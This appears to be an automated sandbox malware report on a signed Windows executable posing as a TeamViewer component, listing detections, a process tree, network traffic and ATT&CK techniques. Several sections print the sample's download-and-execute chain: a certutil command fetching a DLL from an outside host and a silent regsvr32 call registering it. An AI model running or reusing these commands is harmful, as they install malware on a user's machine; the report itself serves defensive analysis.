Play interactive tour

Edit tour

Windows Analysis Report cBQPecnQRp

Overview

General Information

Sample Name:	cBQPecnQRp (renamed file extension from none to exe)
Analysis ID:	483791
MD5:	53817315b195e328ccc0f56b15b247c7
SHA1:	7bedab96b89d000288b573de0b5693cf49dae47f
SHA256:	ea2decec34ae3129d5da1f2035b34cff3c9f656bb4423904ef6b0a3ca5f47d5e
Tags:	exeHartexLLCsigned
Infos:
Most interesting Screenshot:

Detection

Score:	72
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Compliance

Score:	47
Range:	0 - 100

Signatures

Multi AV Scanner detection for submitted file

System process connects to network (likely due to code injection or exploit)

Multi AV Scanner detection for domain / URL

Sigma detected: Regsvr32 Anomaly

Sigma detected: Suspicious Certutil Command

Uses 32bit PE files

Uses a Windows Living Off The Land Binaries (LOL bins)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query locales information (e.g. system language)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

PE file contains sections with non-standard names

Internet Provider seen in connection with other malware

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

JA3 SSL client fingerprint seen in connection with other malware

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Abnormal high CPU Usage

Sample file is different than original file name gathered from version info

Extensive use of GetProcAddress (often used to hide API calls)

PE file contains strange resources

Tries to load missing DLLs

Contains functionality to read the PEB

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Registers a DLL

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w10x64

cBQPecnQRp.exe (PID: 5760 cmdline: 'C:\Users\user\Desktop\cBQPecnQRp.exe' MD5: 53817315B195E328CCC0F56B15B247C7)

cmd.exe (PID: 6152 cmdline: C:\Windows\System32\cmd.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 1368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

certutil.exe (PID: 4528 cmdline: certutil.exe -urlcache -split -f 'https://www.christchurchmvl.org/volunteer/actXApiLib.dll' 'C:\ProgramData\actXApiLib.dll' MD5: D056DF596F6E02A36841E69872AEF7BD)

regsvr32.exe (PID: 5340 cmdline: regsvr32.exe -s -n -i 'C:\ProgramData\actXApiLib.dll' MD5: 426E7499F6A7346F0410DEAD0805586B)

cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

Sigma detected: Regsvr32 Anomaly

Show sources

Source: Process started

Author: Florian Roth, oscd.community: Data: Command: regsvr32.exe -s -n -i 'C:\ProgramData\actXApiLib.dll', CommandLine: regsvr32.exe -s -n -i 'C:\ProgramData\actXApiLib.dll', CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: C:\Windows\System32\cmd.exe, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6152, ProcessCommandLine: regsvr32.exe -s -n -i 'C:\ProgramData\actXApiLib.dll', ProcessId: 5340

Sigma detected: Suspicious Certutil Command

Show sources

Source: Process started

Author: Florian Roth, juju4, keepwatch: Data: Command: certutil.exe -urlcache -split -f 'https://www.christchurchmvl.org/volunteer/actXApiLib.dll' 'C:\ProgramData\actXApiLib.dll', CommandLine: certutil.exe -urlcache -split -f 'https://www.christchurchmvl.org/volunteer/actXApiLib.dll' 'C:\ProgramData\actXApiLib.dll', CommandLine|base64offset|contains: q!, Image: C:\Windows\SysWOW64\certutil.exe, NewProcessName: C:\Windows\SysWOW64\certutil.exe, OriginalFileName: C:\Windows\SysWOW64\certutil.exe, ParentCommandLine: C:\Windows\System32\cmd.exe, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6152, ProcessCommandLine: certutil.exe -urlcache -split -f 'https://www.christchurchmvl.org/volunteer/actXApiLib.dll' 'C:\ProgramData\actXApiLib.dll', ProcessId: 4528

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Multi AV Scanner detection for submitted file

Show sources

Source: cBQPecnQRp.exe

Virustotal: Detection: 10%

Perma Link

Multi AV Scanner detection for domain / URL

Show sources

Source: https://www.christchurchmvl.org/volunteer/actXApiLib.dll

Virustotal: Detection: 11%

Perma Link

Compliance:

Uses 32bit PE files

Show sources

Source: cBQPecnQRp.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Uses secure TLS version for HTTPS connections

Show sources

Source: unknown	HTTPS traffic detected: 100.26.95.170:443 -> 192.168.2.4:49772 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 100.26.95.170:443 -> 192.168.2.4:49773 version: TLS 1.2

PE / OLE file has a valid certificate

Show sources

Source: cBQPecnQRp.exe

Static PE information: certificate valid

Binary contains paths to debug symbols

Show sources

Source:	Binary string: E:\JA\workspace\tv_publicrelease-windows\build_cmake_win\Release\TeamViewer_Note.pdb source: cBQPecnQRp.exe
Source:	Binary string: E:\JA\workspace\tv_publicrelease-windows\build_cmake_win\Release\TeamViewer_Note.pdb) source: cBQPecnQRp.exe

Spreading:

Source: C:\Users\user\Desktop\cBQPecnQRp.exe

Code function: 1_2_00466410 FindFirstFileExW,

1_2_00466410

Networking:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\SysWOW64\certutil.exe	Network Connect: 100.26.95.170 187			Jump to behavior
Source: C:\Windows\SysWOW64\certutil.exe	Domain query: www.christchurchmvl.org

Source: Joe Sandbox View

ASN Name: AMAZON-AESUS AMAZON-AESUS

Source: Joe Sandbox View	JA3 fingerprint: ce5f3254611a8c095a3d821d44539877
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Sep 2021 11:47:29 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1

Source: cBQPecnQRp.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: cBQPecnQRp.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: cBQPecnQRp.exe	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: cBQPecnQRp.exe	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: cBQPecnQRp.exe	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
Source: cBQPecnQRp.exe	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: cBQPecnQRp.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: cBQPecnQRp.exe	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: cBQPecnQRp.exe	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: cBQPecnQRp.exe	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: cBQPecnQRp.exe	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
Source: cBQPecnQRp.exe	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: cBQPecnQRp.exe	String found in binary or memory: http://ocsp.comodoca.com0
Source: cBQPecnQRp.exe	String found in binary or memory: http://ocsp.digicert.com0C
Source: cBQPecnQRp.exe	String found in binary or memory: http://ocsp.digicert.com0O
Source: cBQPecnQRp.exe	String found in binary or memory: http://ocsp.sectigo.com0
Source: cBQPecnQRp.exe	String found in binary or memory: http://www.digicert.com/CPS0
Source: cBQPecnQRp.exe	String found in binary or memory: https://sectigo.com/CPS0
Source: certutil.exe, 0000000A.00000002.776165001.0000000000550000.00000004.00000020.sdmp	String found in binary or memory: https://www.christchurchmvl.org/volunteer/actXApiLib.dll
Source: certutil.exe, 0000000A.00000002.777469638.0000000000930000.00000004.00000040.sdmp	String found in binary or memory: https://www.christchurchmvl.org/volunteer/actXApiLib.dllC:
Source: cBQPecnQRp.exe	String found in binary or memory: https://www.digicert.com/CPS0

Source: unknown

DNS traffic detected: queries for: www.christchurchmvl.org

Source: global traffic	HTTP traffic detected: GET /volunteer/actXApiLib.dll HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheAccept: /User-Agent: Microsoft-CryptoAPI/10.0Host: www.christchurchmvl.org
Source: global traffic	HTTP traffic detected: GET /volunteer/actXApiLib.dll HTTP/1.1Accept: /User-Agent: CertUtil URL AgentHost: www.christchurchmvl.orgCache-Control: no-cache

Source: unknown	HTTPS traffic detected: 100.26.95.170:443 -> 192.168.2.4:49772 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 100.26.95.170:443 -> 192.168.2.4:49773 version: TLS 1.2

System Summary:

Source: cBQPecnQRp.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\certutil.exe certutil.exe -urlcache -split -f 'https://www.christchurchmvl.org/volunteer/actXApiLib.dll' 'C:\ProgramData\actXApiLib.dll'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\certutil.exe certutil.exe -urlcache -split -f 'https://www.christchurchmvl.org/volunteer/actXApiLib.dll' 'C:\ProgramData\actXApiLib.dll'			Jump to behavior

Source: C:\Users\user\Desktop\cBQPecnQRp.exe	Code function: 1_2_004340B0	1_2_004340B0
Source: C:\Users\user\Desktop\cBQPecnQRp.exe	Code function: 1_2_00432A00	1_2_00432A00
Source: C:\Users\user\Desktop\cBQPecnQRp.exe	Code function: 1_2_0049C051	1_2_0049C051
Source: C:\Users\user\Desktop\cBQPecnQRp.exe	Code function: 1_2_0046207C	1_2_0046207C
Source: C:\Users\user\Desktop\cBQPecnQRp.exe	Code function: 1_2_004520EB	1_2_004520EB
Source: C:\Users\user\Desktop\cBQPecnQRp.exe	Code function: 1_2_00402080	1_2_00402080
Source: C:\Users\user\Desktop\cBQPecnQRp.exe	Code function: 1_2_004961AB	1_2_004961AB
Source: C:\Users\user\Desktop\cBQPecnQRp.exe	Code function: 1_2_004321AB	1_2_004321AB
Source: C:\Users\user\Desktop\cBQPecnQRp.exe	Code function: 1_2_00402210	1_2_00402210
Source: C:\Users\user\Desktop\cBQPecnQRp.exe	Code function: 1_2_004443F0	1_2_004443F0
Source: C:\Users\user\Desktop\cBQPecnQRp.exe	Code function: 1_2_0048C4C0	1_2_0048C4C0
Source: C:\Users\user\Desktop\cBQPecnQRp.exe	Code function: 1_2_004744D0	1_2_004744D0
Source: C:\Users\user\Desktop\cBQPecnQRp.exe	Code function: 1_2_0049E4E7	1_2_0049E4E7
Source: C:\Users\user\Desktop\cBQPecnQRp.exe	Code function: 1_2_004024F2	1_2_004024F2
Source: C:\Users\user\Desktop\cBQPecnQRp.exe	Code function: 1_2_004685D0	1_2_004685D0
Source: C:\Users\user\Desktop\cBQPecnQRp.exe	Code function: 1_2_00484580	1_2_00484580
Source: C:\Users\user\Desktop\cBQPecnQRp.exe	Code function: 1_2_004025A0	1_2_004025A0
Source: C:\Users\user\Desktop\cBQPecnQRp.exe	Code function: 1_2_0048E620	1_2_0048E620
Source: C:\Users\user\Desktop\cBQPecnQRp.exe	Code function: 1_2_00402700	1_2_00402700
Source: C:\Users\user\Desktop\cBQPecnQRp.exe	Code function: 1_2_0045A7C0	1_2_0045A7C0
Source: C:\Users\user\Desktop\cBQPecnQRp.exe	Code function: 1_2_00484790	1_2_00484790
Source: C:\Users\user\Desktop\cBQPecnQRp.exe	Code function: 1_2_00402850	1_2_00402850
Source: C:\Users\user\Desktop\cBQPecnQRp.exe	Code function: 1_2_00424970	1_2_00424970
Source: C:\Users\user\Desktop\cBQPecnQRp.exe	Code function: 1_2_004029E0	1_2_004029E0
Source: C:\Users\user\Desktop\cBQPecnQRp.exe	Code function: 1_2_00402B70	1_2_00402B70
Source: C:\Users\user\Desktop\cBQPecnQRp.exe	Code function: 1_2_00464CC9	1_2_00464CC9
Source: C:\Users\user\Desktop\cBQPecnQRp.exe	Code function: 1_2_00402CF0	1_2_00402CF0
Source: C:\Users\user\Desktop\cBQPecnQRp.exe	Code function: 1_2_00402E70	1_2_00402E70
Source: C:\Users\user\Desktop\cBQPecnQRp.exe	Code function: 1_2_0048CFC0	1_2_0048CFC0
Source: C:\Users\user\Desktop\cBQPecnQRp.exe	Code function: 1_2_0049901A	1_2_0049901A
Source: C:\Users\user\Desktop\cBQPecnQRp.exe	Code function: 1_2_0045B2E0	1_2_0045B2E0
Source: C:\Users\user\Desktop\cBQPecnQRp.exe	Code function: 1_2_004773C0	1_2_004773C0
Source: C:\Users\user\Desktop\cBQPecnQRp.exe	Code function: 1_2_00401390	1_2_00401390
Source: C:\Users\user\Desktop\cBQPecnQRp.exe	Code function: 1_2_00433450	1_2_00433450
Source: C:\Users\user\Desktop\cBQPecnQRp.exe	Code function: 1_2_004454F0	1_2_004454F0
Source: C:\Users\user\Desktop\cBQPecnQRp.exe	Code function: 1_2_0046B48F	1_2_0046B48F
Source: C:\Users\user\Desktop\cBQPecnQRp.exe	Code function: 1_2_004514A0	1_2_004514A0
Source: C:\Users\user\Desktop\cBQPecnQRp.exe	Code function: 1_2_004014B0	1_2_004014B0
Source: C:\Users\user\Desktop\cBQPecnQRp.exe	Code function: 1_2_0045154D	1_2_0045154D
Source: C:\Users\user\Desktop\cBQPecnQRp.exe	Code function: 1_2_00433569	1_2_00433569
Source: C:\Users\user\Desktop\cBQPecnQRp.exe	Code function: 1_2_004755F0	1_2_004755F0
Source: C:\Users\user\Desktop\cBQPecnQRp.exe	Code function: 1_2_0046B5AF	1_2_0046B5AF
Source: C:\Users\user\Desktop\cBQPecnQRp.exe	Code function: 1_2_00401610	1_2_00401610
Source: C:\Users\user\Desktop\cBQPecnQRp.exe	Code function: 1_2_00493680	1_2_00493680
Source: C:\Users\user\Desktop\cBQPecnQRp.exe	Code function: 1_2_00401760	1_2_00401760
Source: C:\Users\user\Desktop\cBQPecnQRp.exe	Code function: 1_2_0048D7F0	1_2_0048D7F0
Source: C:\Users\user\Desktop\cBQPecnQRp.exe	Code function: 1_2_004337A0	1_2_004337A0
Source: C:\Users\user\Desktop\cBQPecnQRp.exe	Code function: 1_2_00499809	1_2_00499809
Source: C:\Users\user\Desktop\cBQPecnQRp.exe	Code function: 1_2_004518BF	1_2_004518BF
Source: C:\Users\user\Desktop\cBQPecnQRp.exe	Code function: 1_2_0048B9A0	1_2_0048B9A0

Source: C:\Users\user\Desktop\cBQPecnQRp.exe	Code function: String function: 00421740 appears 48 times
Source: C:\Users\user\Desktop\cBQPecnQRp.exe	Code function: String function: 0044FEB0 appears 40 times
Source: C:\Users\user\Desktop\cBQPecnQRp.exe	Code function: String function: 0044F762 appears 75 times
Source: C:\Users\user\Desktop\cBQPecnQRp.exe	Code function: String function: 00420FA0 appears 63 times
Source: C:\Users\user\Desktop\cBQPecnQRp.exe	Code function: String function: 0044F26F appears 71 times

Source: C:\Users\user\Desktop\cBQPecnQRp.exe

Code function: 1_2_0044E3F5 NtFlushProcessWriteBuffers,NtFlushProcessWriteBuffers,

1_2_0044E3F5

Source: C:\Users\user\Desktop\cBQPecnQRp.exe

Process Stats: CPU usage > 98%

Source: cBQPecnQRp.exe	Binary or memory string: OriginalFilename vs cBQPecnQRp.exe
Source: cBQPecnQRp.exe, 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameTeamViewer_Note.exe6 vs cBQPecnQRp.exe
Source: cBQPecnQRp.exe	Binary or memory string: OriginalFilenameTeamViewer_Note.exe6 vs cBQPecnQRp.exe

Source: cBQPecnQRp.exe

Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: sfc.dll			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: actxapilib.dll			Jump to behavior

Source: cBQPecnQRp.exe

Virustotal: Detection: 10%

Source: cBQPecnQRp.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\cBQPecnQRp.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\cBQPecnQRp.exe 'C:\Users\user\Desktop\cBQPecnQRp.exe'
Source: C:\Users\user\Desktop\cBQPecnQRp.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\certutil.exe certutil.exe -urlcache -split -f 'https://www.christchurchmvl.org/volunteer/actXApiLib.dll' 'C:\ProgramData\actXApiLib.dll'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe -s -n -i 'C:\ProgramData\actXApiLib.dll'
Source: C:\Users\user\Desktop\cBQPecnQRp.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\certutil.exe certutil.exe -urlcache -split -f 'https://www.christchurchmvl.org/volunteer/actXApiLib.dll' 'C:\ProgramData\actXApiLib.dll'	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe -s -n -i 'C:\ProgramData\actXApiLib.dll'	Jump to behavior

Source: classification engine

Classification label: mal72.evad.winEXE@8/1@2/1

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1368:120:WilError_01

Source: C:\Users\user\Desktop\cBQPecnQRp.exe

Code function: 1_2_00422D90 LoadResource,LockResource,SizeofResource,

1_2_00422D90

Source: C:\Users\user\Desktop\cBQPecnQRp.exe

Command line argument: ~GI

1_2_004946D0

Source: C:\Windows\SysWOW64\certutil.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\certutil.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\certutil.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: cBQPecnQRp.exe

Static file information: File size 1363448 > 1048576

Source: cBQPecnQRp.exe

Static PE information: certificate valid

Source: cBQPecnQRp.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: cBQPecnQRp.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: cBQPecnQRp.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: cBQPecnQRp.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: cBQPecnQRp.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: cBQPecnQRp.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: cBQPecnQRp.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: E:\JA\workspace\tv_publicrelease-windows\build_cmake_win\Release\TeamViewer_Note.pdb source: cBQPecnQRp.exe
Source:	Binary string: E:\JA\workspace\tv_publicrelease-windows\build_cmake_win\Release\TeamViewer_Note.pdb) source: cBQPecnQRp.exe

Source: cBQPecnQRp.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: cBQPecnQRp.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: cBQPecnQRp.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: cBQPecnQRp.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: cBQPecnQRp.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation:

Source: C:\Users\user\Desktop\cBQPecnQRp.exe	Code function: 1_2_00434A6C push eax; ret	1_2_00434A91
Source: C:\Users\user\Desktop\cBQPecnQRp.exe	Code function: 1_2_00410AAA push ss; iretd	1_2_00410AAB
Source: C:\Users\user\Desktop\cBQPecnQRp.exe	Code function: 1_2_0044F73C push ecx; ret	1_2_0044F74F
Source: C:\Users\user\Desktop\cBQPecnQRp.exe	Code function: 1_2_00493990 push ecx; mov dword ptr [esp], ecx	1_2_00493991

Source: cBQPecnQRp.exe

Static PE information: section name: .didat

Source: C:\Users\user\Desktop\cBQPecnQRp.exe

Code function: 1_2_004A5845 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

1_2_004A5845

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe -s -n -i 'C:\ProgramData\actXApiLib.dll'

Hooking and other Techniques for Hiding and Protection:

Source: C:\Users\user\Desktop\cBQPecnQRp.exe

Code function: 1_2_0044E000 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

1_2_0044E000

Malware Analysis System Evasion:

Source: C:\Windows\SysWOW64\certutil.exe TID: 6060

Thread sleep time: -30000s >= -30000s

Jump to behavior

Source: C:\Users\user\Desktop\cBQPecnQRp.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\cBQPecnQRp.exe

Code function: 1_2_0044C1E6 VirtualQuery,GetSystemInfo,

1_2_0044C1E6

Source: C:\Users\user\Desktop\cBQPecnQRp.exe

Code function: 1_2_00466410 FindFirstFileExW,

1_2_00466410

Anti Debugging:

Source: C:\Users\user\Desktop\cBQPecnQRp.exe

Code function: 1_2_0044EE91 IsDebuggerPresent,OutputDebugStringW,

1_2_0044EE91

Source: C:\Users\user\Desktop\cBQPecnQRp.exe

Code function: 1_2_004A5845 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

1_2_004A5845

Source: C:\Users\user\Desktop\cBQPecnQRp.exe

Code function: 1_2_004944F0 TlsGetValue,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,TlsSetValue,GetProcessHeap,HeapFree,

1_2_004944F0

Source: C:\Users\user\Desktop\cBQPecnQRp.exe	Code function: 1_2_0046619E mov eax, dword ptr fs:[00000030h]	1_2_0046619E
Source: C:\Users\user\Desktop\cBQPecnQRp.exe	Code function: 1_2_00434891 mov eax, dword ptr fs:[00000030h]	1_2_00434891
Source: C:\Users\user\Desktop\cBQPecnQRp.exe	Code function: 1_2_0044ECD5 mov esi, dword ptr fs:[00000030h]	1_2_0044ECD5
Source: C:\Users\user\Desktop\cBQPecnQRp.exe	Code function: 1_2_0045D9CF mov eax, dword ptr fs:[00000030h]	1_2_0045D9CF

Source: C:\Users\user\Desktop\cBQPecnQRp.exe	Code function: 1_2_0044FE43 SetUnhandledExceptionFilter,	1_2_0044FE43
Source: C:\Users\user\Desktop\cBQPecnQRp.exe	Code function: 1_2_0045976E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_0045976E
Source: C:\Users\user\Desktop\cBQPecnQRp.exe	Code function: 1_2_0044F8B8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	1_2_0044F8B8

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\SysWOW64\certutil.exe	Network Connect: 100.26.95.170 187			Jump to behavior
Source: C:\Windows\SysWOW64\certutil.exe	Domain query: www.christchurchmvl.org

Source: C:\Users\user\Desktop\cBQPecnQRp.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\certutil.exe certutil.exe -urlcache -split -f 'https://www.christchurchmvl.org/volunteer/actXApiLib.dll' 'C:\ProgramData\actXApiLib.dll'	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe -s -n -i 'C:\ProgramData\actXApiLib.dll'	Jump to behavior

Language, Device and Operating System Detection:

Source: C:\Users\user\Desktop\cBQPecnQRp.exe	Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	1_2_00468B1F
Source: C:\Users\user\Desktop\cBQPecnQRp.exe	Code function: EnumSystemLocalesW,	1_2_00468DC7
Source: C:\Users\user\Desktop\cBQPecnQRp.exe	Code function: EnumSystemLocalesW,	1_2_00468E12
Source: C:\Users\user\Desktop\cBQPecnQRp.exe	Code function: EnumSystemLocalesW,	1_2_00468EAD
Source: C:\Users\user\Desktop\cBQPecnQRp.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	1_2_00468F40
Source: C:\Users\user\Desktop\cBQPecnQRp.exe	Code function: GetLocaleInfoW,	1_2_004691A0
Source: C:\Users\user\Desktop\cBQPecnQRp.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	1_2_004692C6
Source: C:\Users\user\Desktop\cBQPecnQRp.exe	Code function: GetLocaleInfoW,	1_2_004693CC
Source: C:\Users\user\Desktop\cBQPecnQRp.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	1_2_0046949B
Source: C:\Users\user\Desktop\cBQPecnQRp.exe	Code function: EnumSystemLocalesW,	1_2_0046354D
Source: C:\Users\user\Desktop\cBQPecnQRp.exe	Code function: GetLocaleInfoW,	1_2_004639F3

Source: C:\Users\user\Desktop\cBQPecnQRp.exe

Code function: 1_2_0041E0FC cpuid

1_2_0041E0FC

Source: C:\Users\user\Desktop\cBQPecnQRp.exe

Code function: 1_2_00440690 GetLocalTime,

1_2_00440690

Remote Access Functionality:

Source: C:\Users\user\Desktop\cBQPecnQRp.exe	Code function: 1_2_004A85C0 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext,		1_2_004A85C0
Source: C:\Users\user\Desktop\cBQPecnQRp.exe	Code function: 1_2_004A7879 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,		1_2_004A7879

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Command and Scripting Interpreter2	DLL Side-Loading1	Process Injection111	Virtualization/Sandbox Evasion1	OS Credential Dumping	System Time Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel11	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Native API1	Application Shimming1	DLL Side-Loading1	Process Injection111	LSASS Memory	Security Software Discovery2	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Ingress Tool Transfer3	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Application Shimming1	Deobfuscate/Decode Files or Information1	Security Account Manager	Virtualization/Sandbox Evasion1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Obfuscated Files or Information2	NTDS	Remote System Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol4	SIM Card Swap		Carrier Billing Fraud
